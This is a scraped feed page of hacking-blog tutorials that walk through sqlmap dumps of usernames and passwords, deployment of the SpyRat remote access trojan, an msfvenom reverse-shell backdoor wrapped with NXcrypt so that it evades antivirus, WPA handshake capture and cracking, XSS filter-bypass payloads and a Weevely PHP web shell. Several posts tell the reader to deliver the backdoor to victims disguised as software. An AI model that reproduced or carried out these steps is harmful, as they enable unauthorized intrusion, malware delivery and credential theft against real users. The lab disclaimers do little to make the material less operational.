Loading...

Follow FH-Team - Penetration Testing | Ethical Hacking on Feedspot

Continue with Google
Continue with Facebook
or

Valid

Hello friend’s, all of we know that wordpress is one of the most popular platform now a days. It cover lot’s market because it’s open source and awesome features, etc.

WordPress have a default things like database contents and path also, so sometime it easy to gather information with predefined installation of it. Here we are also going to perform a basic information gathering work with a simple python script.

In this tutorial, we are going to gather the information about user which available on particular wordpress based website. for this we are going to use a simple python script which named as wpscanner.py, created by 4hm3d

Download wpscanner or can also say it WordPress Users Scan/Enumerate from github-

git clone https://github.com/4hm3d/WordPress-Users-Scanner.git 
cd WordPress-Users-Scanner

We need to give only target url of wordpress based website, for that follow the commands given below-

python wpscanner.py -s http://example.com -n 10

Where -s is refer for site and the -n is for number of users to enumerate.

So this is very simple information gathering task against wordpress based platform, I hope you like it. and if you are facing any issue related to this topic or else free feel to contact me.

Read Full Article
  • Show original
  • .
  • Share
  • .
  • Favorite
  • .
  • Email
  • .
  • Add Tags 

Hello friend’s, lots of people ask me that can we able to run the tools on windows which are preinstalled in Kali Linux or any other penetration testing distro. My answer is here yes, we can easily install and run various penetration tools on windows platform also, but they required some dependencies. For ex a tool which creates in python with .py raw extension so this kind of tool or program required python to run it, that’s the common sense.

In this article we are going to learn about SQLMAP but we are using it on windows platform. SQLMAP built in python, so we required python. For that we need to download python from here https://www.python.org/downloads/ and SQLMAP itself. One more thing you can also download Git which help to clone things from github and many other things. https://git-scm.com/

SQLMAP is an open source software that is used to detect and exploit database vulnerabilities and provides options for injecting malicious codes into them. It is a penetration testing tool that automates the process of detecting and exploiting SQL injection flaws providing its user interface in the terminal.

Download SQLMAP from github, for that open terminal and follow the command given below-

git clone https://github.com/sqlmapproject/sqlmap.git 
cd sqlmap

For run sqlmap basically there are two ways, if we add path of python at the time of installation then we can directly run it using “python sqlmap.py” or else we need to run it like shown into the picture below-

In the above example, run sqlmap using python. but for that we need to also specify python.exe path

Now we will move towards some of sqlmap basic and important commands or use which helps an attacker or penetration tester to dump the database of a vulnerable website.

As all of my friends know that this tutorial only for Education Purposes or Testing Purposes. So I am testing it my own lab.

Here we are interested to know the database name or how many databases presents. For that we are going to use commands given below-

python sqlmap.py "http://example.com/index.php?id=1" --dbs 
In the above example, we get one or numbers of databases present on target system.

After getting database name we will look for the tables present in every database. for that need to execute the commands given below-

python sqlmap.py "http://example.com/index.php?id=1" -D security --tables 
In the above example, security is database name that we are looking for tables of it.

Now we look for the columns of the specific table, for that we need use command given below-

python sqlmap.py "http://example.com/index.php?id=1" -D security -T users --columns
In the above example, users is table present in database security.

Now we can dump data of whole columns present or we can also look into particular one.

python sqlmap.py "http://example.com/index.php?id=1" -D security -T users --C username,password --dump
In the above example, username and password are columns name.

This is all about sqlmap basic use which helps us to dump database of any sql vulnerable website. There are also lots of advance options that we will see in upcoming articles. So I hope you love this tutorial and lots of people use windows so I help them a lot, hope so. Thank you guys and if you facing any problem related to this topic or else you can comment below.

Read Full Article
  • Show original
  • .
  • Share
  • .
  • Favorite
  • .
  • Email
  • .
  • Add Tags 

Hello friend’s, as we know information gathering is one of the most important task for a penetration tester or an attacker. So we use different tools for information gathering like scanners,search engine as well as lots of other techniques eg social engineering.

So this tutorial is basic about the information gathering stuff which help an attacker or penetration tester lot. Sometime we are trying to find all the links that included in a specific page. or else we can take simple example of unlock system for download so we need to like or subscribe what if you will get direct download link of that particular file. For this kind of information gathering we need a links grabber or finder, one of link grabber is LinksF1nd3r.

LinksF1nd3r is use to gather the links of specific page contents that includes JS [JavaScript], HTML, Image, PHP and others so it’s useful tool for web information gathering or grab links. LinksF1nd3r is written in python and developed by ihebski

Download LinksF1nd3r from github and also install python dependencies for LinksF1nd3r, follow the command given below-

git clone https://github.com/ihebski/LinksF1nd3r.git
cd LinskF1nd3r
pip install -r requirements.txt

Now run linksF1nd3r.py file with an arguments of url or we can say a particular page, that we want to grab links, follow the command given below-

python linksF1nd3r.py http://127.0.0.1/index.html
In above example, the index.html contain html and js file which has been grab.

So in this simple way this tool help us to grab link and we can analysis them manually. I hope you like this short tutorial and one more good news for you my friends we will upload lots of CTF walk through soon. The video session of this tutorial will upload soon.

Read Full Article
  • Show original
  • .
  • Share
  • .
  • Favorite
  • .
  • Email
  • .
  • Add Tags 

Hello friend’s, I am back here with one more tutorial on Rat’s. Lot’s of my friend’s ask me about RAT and how we can create our own rat. So In this tutorial we are going to learn about a rat which built in python as well as we can refer it to create our own.

RAT is refer as Remote Access Trojan, which help an attacker to give an access of victim system, Here we are going to use a rat called as SpyRat which is written in python and developed by M4sc3r4n0

Mostly rat gives reverse shell, in that attacker only need to listen on particular port.

First we need to download our tool from github for that use the commands given below-

git clone https://github.com/M4sc3r4n0/spyrat.git 
cd spyrat

So in directory of spyrat, there are two python files one is client.py and other one is listener.py. As we say in general server client model that client request to the sever. For that we need to specify the listener or attacker IP address with a specific port number, we are going to do it manually isn’t it great, there is line number 75 in client.py need to put your own IP address with specific port number.

In above example, 192.1681.4 is my local IP address with 666 port number.
Note:- Want to try it over the LAN use ngrok or port forwarding with no-ip.

Share the client.py with victim using various delivery methods. and we need to start listener.py to listen the request come from our client.py To start listener follow the commands given below-

sudo python listener.py 

Need to enter an our IP with specific port that we already configured in client file.

In above example, host is attacker ip and port number that given in client file.

Wait for the victim to run client.py file or we can also convert it into an exe format using pyinstaller. after that type help to check the number of commands given by reverse shell.

I hope you enjoy the tutorial, if you have any query related to this topic or other topic please free feel to contact me. The video tutorial of this post will be upload soon.

Read Full Article
  • Show original
  • .
  • Share
  • .
  • Favorite
  • .
  • Email
  • .
  • Add Tags 

Hello Friend’s, I am back here with a new tutorial, as we know lots of people create a backdoor using msfvenom with or without encoder option. If you go with one of the famous encoder “shikata ga nai” is also detected by many antiviruses. So here is the issue comes in scenario, if you are penetration tester or ethical hacking trying for post exploitation then obviously you will try to execute some file [backdoor] on that particular machine.

Most important challenge is here that an attacker need to encode backdoor in a way that none of antivirus will detect it or bypass it. In this tutorial we are going to use a encoder/encrypter called as NXcrypt to create FUD [Fully UnDetectable] file, that will bypass AV.

NXcrypt is a crypter or encoder which developed in python or we can also python backdoor’ framework, which help us to create an FUD. It’s use rsa algorithm for that. I am going to bypass avast antivirus by using nxcrypt which demonstrate given below.

Download NXcrypt from github-

cd Desktop [change path to desktop]
git clone https://github.com/Hadi999/NXcrypt.git
cd NXcrypt

Here we need to create an exploit by using msfvenom that will help us to get reverse shell of victim computer for that need to follow command given below- msfvenom -p python/meterpreter/reverse_tcp lhost=192.168.x.x lport=4444 -o test.py

In the above example we use mefvenom to create a backdoor where -p represent payload type lhost & lport is listener ip & port i.e. attacker’s test.py is file name we are created

Now we need to encode our exploit that is test.py so for that we are using NXcrypt. Before use NXcrypt we need to give it an executable permission by using command chmod +x NXcrypt.py and after that need to execute the command given below- sudo ./NXcrypt.py –file=test.py –output=crypt_test.py

In the above example test.py file is out backdoor that we are going to encoded with nxcrypt and saving new filename i.e. crypt_test.py is encoded file of test.py

Now we can upload it to the victim system or we can give the link to victim and say that it’s software that you need to install or run it’s depend on attacker’s mind or methodology.

I tested it my own system, first i start a local server and download file to the windows machine that already have python 2.7 as well as updated avast antivirus. You can also try this method for that you need to follow the commands given below- python3 -m http.server

In the above picture, i simply started a web server using python
In the above picture victim open link and download our encrypted backdoor file

But one more important thing here, whenever victim run file we need listener to listen on the particular port that we specified while creating our backdoor. So here i started multi handler of msf for that you need to follow commands given below-

msfconsole 
use exploit/multi/handler
set payload python/meterpreter/reverse_tcp
In the above picture we started msfconsole and set multi handler with a specific payload

Enter options command and you can see the options that are required, LHOST i.e. Listener host required [attacker’s ip]

In the above picture, we set lhost i.e. our ip address and well as we started listener in background

How a victim run that file, main thing to run our backdoor required python, that i already installed.

In the above picture, Victim run file by using cmd and followed specific command.

When victim perform above task then an attacker get reverse shell in the listener of msfconsole which like given below-

An attacker can able to operate victim system remotely.

I hope you like this tutorial, so please comment your reviews and if you have any issue related to this topic or else tell me that also.

Read Full Article
  • Show original
  • .
  • Share
  • .
  • Favorite
  • .
  • Email
  • .
  • Add Tags 

I saw lots of my friends having problem while enabling monitor mode, so here i bring a simple and basic method to change/set monitor mode of an external wifi adapter like tp-link or alfa, etc.

First we need to verify the name of wireless interface or we can say wifi adapter it may be external or built-in, for that we need to run the command given below-

ifconfig
In the above example, wlan0 is a wireless interface, an external wifi adapter.

Now to check which interface have wireless extension, we are also ging to use a command, we can predict that eth0 and lo doesn’t have wireless extension, as well as we also use it to verify the mode of an interface. So we are using command below-

iwconfig
In the above example, we can see that mode type is Managed.

First we need to down the interface, otherwise it may be give an error that interface is busy with so and so process. for that use command given below-

ifconfig wlan0 down
In the above example, we down the wlan0 interface,
[where wlan0 is interface name, it may be different in your case]

Let’s change interface mode from Managed to Monitor, for that we need to use command below-

iwconfig wlan0 mode monitor

To verify that the mode is set on monitor or not use the following command, as we use above-

iwconfig
In the above example, that mode of wlan0 interface is set to monitor.

Now we to need to up the interface to work, for that you need to execute the command given below-

ifconfig wlan0 up

Now we can use the particular interface in monitor mode, like you can use it with airodump-ng wlan0 to capture the packets of all wifi-networks around us. If you don’t know how to use airodump-ng the you can refer the wifi hacking tutorial, the link given below-

I hope you enjoy this tutorial, you can comment if your facing any issue with this topic or any other topic, as well as you can share your reviews about us, thank you.

Read Full Article
  • Show original
  • .
  • Share
  • .
  • Favorite
  • .
  • Email
  • .
  • Add Tags 

Hello friend’s, as we know that wifi hacking is one of the most popular stuff into hacking field. There are lots of methods to crack wifi encryption. It contains different encryption like WEP, WPA, WPA2, WPA3. As well as lots of tools available to perform attacks against target wifi network.

Aircrack-ng is suite of tools which use for wifi cracking, it perform different task monitoring, testing, cracking. developed by Thomas d’Otreppe de Bouvette. Aircrack-ng precome in lots of penetration operating system like Kali Linux, Parrot Sec, etc.

If you don’t know what is monitor mode and how to put wifi adapter on monitor mode refer the link given below-
http://fukreyhackers.in/get-wifi-networks-around-us-change-mac-enable-monitor-mode-wifi-hacking-basics/

Here we need to check that how much interfaces we have or cross verify our external wifi adapter name or it’s connected or not, it may be tp-link or alfa that support packet injection. To check interfaces their command ifconfig

In the above case, an external wifi adapter is wlan1.

Now we need to put it on monitor mode to capture traffic of all the wifi network around us. for that i am using a command airmon-ng start wlan1 which is part of aircrack suite, where wlan1 is external wifi adapter.

It’s time to capture the traffic of wifi network around us, basically an Access Point or we can say Router continuously broadcast beacon frames. and say I am here, to show their own existence.

Capture traffic of all wifi network around us their is command in aircrack suite, that is airodump-ng wlan1mon .

In the above case, it’s shows all the wifi network around us.

The above step will help us to gather information of all wifi network around is like their bssid, essid, channel, encryption, also the client connected to them. Now it’s time to gather information or we can say we need to capture the WPA 4 way handshake about a specific target in my case it’s fh_team. for that we need to run specific command given below-
airodump-ng –bssid 10:BE:XX:XX:XX:XX –channel 1 –write wpa-test wlan1mon [where bssid is mac address of router or access point; channel is the given as CH it’s vary with regions; wpa-test is output file name]

In the above case, i successfully captured wpa handshake.

The above step took time, it’s depends on the number of client connected to our target, then an attacker need to do a deauthentication attack to disconnect the clients and let them reconnect. When clients try to reconnect to an Access Point an attacker capture the wpa handshake.

If you don’t know a deauthentication attack refer the article, link given below-
http://fukreyhackers.in/how-to-dos-deauthentication-attack-on-any-wifi-network/

After capture wpa handshake, we can go to any place and try to crack it’s with different tools. we are using here aircrack-ng which help us to crack encryption using dictionary attack. you can also try another way to crack it.

The command for it is very simple which is given below, but one more thing is important that if password is not present into wordlist/ dictionary then it doesn’t match that’s common sense, so we need to use number dictionary here or can do perfect information gathering about target and create a custom dictionary.
aircrack-ng wpa-test.cap -w rockyou.txt [where wpa-test.cap is file name; rockyou.txt is general dictionary ]

It depends on your system speed, and accuracy of dictionary.

By using this method we can crack wpa/wpa2 wifi encryption, there are lot’s of methods which will we will discuss later. If you have any issue regrading to this tutorial or other tutorial please let me know.

Learn with Visual On YouTube
How to hack WiFi with simple 5-Steps (aircrack-ng) wpa/wpa2 - YouTube
Read Full Article
  • Show original
  • .
  • Share
  • .
  • Favorite
  • .
  • Email
  • .
  • Add Tags 

Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious codes are injected into trusted websites. XSS attack occur when an attacker allow to inject malicious code in text boxes, search bar, etc. generally code is client sides because of it executed to the client machine, In some cases that the request does not go on server. Because of this it’s harder to detect.

XSS categories into different types based on behavior :

  • Reflected Cross-Site Scripting (XSS)
  • Stored Cross-Site Scripting (XSS)
  • DOM base Cross-Site Scripting (XSS)

Reflected Cross-Site Scripting (XSS) :

Reflected Cross-Site Scripting is non persistent and it doesn’t stored anything. It work only if the victim/target visit that specially crafted URL. Because of this an attacker need to send the URL to the victim and once victim check that crafted url then it will executed code on the target/victim machine.

For demonstration purpose we are using here DVWA – Damm Vulnerable Web Application. If you don’t know about DVWA you can check the link given below – http://www.dvwa.co.uk/

We can do test on the DVWA according to the different security level like low, medium,high,impossible.

Let’s Try it with the Low Security Level

Now we will try to inject simple JavaScript code like just only alert function, if it execute that code and shows pop up then you can say that it have XSS vulnerability from different categories given above.

I am try to inject simple JavaScript alert code <script>alert(‘fhteam’);</script> or you can also try simple html tags like <h1>fhteam</h1>

I am try to inject simple JavaScript
<script>alert(‘fhteam’);</script> and try to execute it
Our Script executed successfully now the attacker can able inject more malicious code and send that crafted url to the victim to takeover their system. (That we will see in the upcoming article Beef-XSS)

What if the Security is high or medium in case of DVWA?

In such case, that will not allow to inject such type of code like if we are trying to inject <script>alert(‘fhteam’);</script> then the filter or security system remove <script> tags and simple shows the text alert(‘fhteam’). Solution for this challenge is very simple that need to bypass that specific condition which checking <script> tags. There are many ways to bypass it i am going to show you some of them, which are given below –

<sCripT>alert(‘fhteam’);</scRiPt>
<a onmouseover = ” alert(‘fhteam’)”>XSS</a>
<img src=/ “onerror = alert(‘fhteam’)”></img>
or you can follow the OWASP links given below which provide you lots of information https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet

Stored Cross-Site Scripting (XSS) :

Stored based Cross-Site Scripting is persistent and it will be stored on the page or database. In this case the code injected by an attacker will be execute every time. Because of this behavior it may be very harmful for the end users, attacker able to gain an access of end user system.

In the above example, it will able to store some data.
In the above example, an attacker inject script and if after that a normal user visit that page then it will automatically execute on that user system.

DOM based Cross-Site Scripting (XSS) :

DOM based XSS or type-0-xss is that when an attacker run payload it execute in DOM environment i.e. into the victim browser which is purely client side script. It doesn’t go to the server where server may have filter which may stop malicious script. Because of this behavior it’s more dangerous attack.

In the above example, we put an simple alert script into dom environment where simple select language which does’t goes to the server.
You can see that script run successfully

I hope you enjoy this tutorial, I will also make a video series on XSS and will also update this tutorial whenever needed.

Read Full Article
  • Show original
  • .
  • Share
  • .
  • Favorite
  • .
  • Email
  • .
  • Add Tags 

Hash is function which is take input as string to a fixed size, the output is called as Hash value. It may be irreversible, their different algorithm which can call Hash function. Example MD5, SHA1, etc.

Generally an attacker use various methods to crack or decrypt hash value, like brute force, dictionary methods, etc. But what if an attacker find hash value in different resources and find hash value without cracking.

Hash Buster is one of the tool which perform same task, it doesn’t try to crack a hash value. It try to match hash value from different resources.

It’s coded in python language by s0md3v. which having cool features like detect hash type automatically and else.

Features :

  • Automatic hash type identification
  • Supports MD5, SHA1, SHA256, SHA384, SHA512
  • Can extract & crack hashes from a file
  • Can find hashes from a directory, recursively
  • Multi-threading
Insallation & Usage :
git clone https://github.com/s0md3v/Hash-Buster.git cd Hash-Buster make install buster or
python3 hash.py

Cracking a Single Hash Value:

buster -s <hash> or 
python3 hash.py -s <hash>

Cracking hashes with file:

buster -f /home/user/hashes.txt or 
python3 hash.py -f /home/user/hashes.txt

Cracking hashes from directory:

buster -d /home/user/hashes or 
python3 hash.py -d /home/user/hashes

You can use options of your choice and good luck to bust hashes, the problem with these tool is that it find only those hashes which present into databases where tool is checking for it.

Read Full Article
  • Show original
  • .
  • Share
  • .
  • Favorite
  • .
  • Email
  • .
  • Add Tags 

Hello friend’s, Today we are going learn about very common vulnerability of website. Lots of website include contact form or registration form or something uploading form like images, doc files, etc. If the coding is weak at that point and luckily an attacker exploit that vulnerability. Like an attacker about to upload some executable files for ex: on apache server .php can compile and able to perform various operations. So if an attacker able to upload a reverse php shell on that particular target, then he/she able to get remote access of the target system.

Weevely is a web shell designed for post-exploitation purposes that can be extended over the network at runtime.

Upload weevely PHP agent to a target web server to get remote shell access to it. It has more than 30 modules to assist administrative tasks, maintain access, provide situational awareness, elevate privileges, and spread into the target network.

Features
  • Shell access to the target
  • SQL console pivoting on the target
  • HTTP/HTTPS proxy to browse through the target
  • Upload and download files
  • Spawn reverse and direct TCP shells
  • Audit remote target security
  • Run Meterpreter payloads
  • Port scan pivoting on target
  • Mount the remote filesystem
  • Bruteforce SQL accounts pivoting on the target

For this demonstration, I am using DVWA – Damm Vulnerable Web Application, Which is freely available. If you don’t know how to Setup DVWA refer this link https://youtu.be/3IdVWz_RaZo and set security priority to Low.

Generate php file using Weevely

weevely generate 123456 hack.php //where 123456 is password while you will try to connect to the victim and hack.php is file name, any name you can give. 

After creation of file try to upload it on your target system

Connect to the Victim

weevely [url of our php file] password 
Ex: weevely http://192.168.0.101/dvwa/hackable/uploads/hack.php 123456

After getting successful connection you can able to perform lots of action, for better understanding go with virtual learning.

Learn with Visual On YouTube

Weevely | File Upload Vulnerability with DVWA | Kali Linux 2018.3 - YouTube

Read Full Article

Read for later

Articles marked as Favorite are saved for later viewing.
close
  • Show original
  • .
  • Share
  • .
  • Favorite
  • .
  • Email
  • .
  • Add Tags 

Separate tags by commas
To access this feature, please upgrade your account.
Start your free month
Free Preview